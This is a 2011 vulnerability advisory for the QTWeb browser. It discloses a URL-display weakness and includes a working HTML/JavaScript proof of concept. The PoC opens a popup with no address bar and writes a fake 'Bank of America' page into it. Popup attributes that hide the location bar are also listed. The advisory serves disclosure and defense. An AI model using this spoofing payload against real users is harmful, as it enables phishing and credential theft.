#################################################
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof
or phishing attacks
Vendor URL: http://www.qtweb.net/
Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
Vendor notify: YES exploit available: YES
##################################################
###################
Description By vendor
###################
QtWeb Internet Browser - lightweight, secure and portable browser
having unique user interface and privacy features. QtWeb is an open
source project based on Nokia's Qt framework and Apple's WebKit
rendering engine (the same as being used in Apple Safari and Google
Chrome).
######################
Vulnerability Description
######################
In a normal case when navigate to a site, the browser shows real URL
But it has a weakness and a attacker can show a empty URL. This
weakness can be used for pishing or spoof attacks because you can
think that you are in bank of america for example and the browser
don't show nothing in URL:)
Whithout Any URL =>
http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg
Also a attacker can compose a popup with atributes and it can be used
too for spoof or phishing attacks.
toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0
Popup Whithout Toolbars and address bar =>
http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg
################
Versions afected
################
QTweb 3.7.2 Vulnerable
QTweb 3.7.3 (buils 087) Vulnerable
and posible prior versions.
######################
Proof Of Concept
######################
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL
weakness Spoof testcase by Lostmon</title>
<script type="text/javascript">
var wx;
function invokePoC() {
wx = open(":#:","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write("<title>Bank of America | Home |
Personal</title><img
src='data:image/gif;base64,R0lGODdh8QLUAfcAAAAAAAAAQAAAgAAA/wAgAAAgQAAggAAg/wBAAABAQABAgABA/wBgAABgQABggABg/wCAAACAQACAgACA/wCgAACgxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxNG7MQOvIAAADs='/>");
}
</script>
</head>
<body>
<h1>QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness
Spoof testcase by Lostmon</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p>First Click in this link ==> <a href=":#:" onClick="invokePoC();"
target="_blank">invoke PoC</a></p>
<p>and Look in result window, the address bar , don't show The url
and if you write any url in the address bar, the browser do not navigate to it.
This issue can be used to spoof sites or pishing attacks.
Safari 5.1 (7534.50)
</body>
</html>
################
Solution
###############
No solution at this time !!!
###############
Timeline
###############
Discovered :Mar 30, 2011
Vendor Notify: Sep 28, 2011
Vendor response: XXXXX
Vendor Patch: XXXXXX
Public Disclosure: Oct 03, 2011
########################## ?nd ########################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....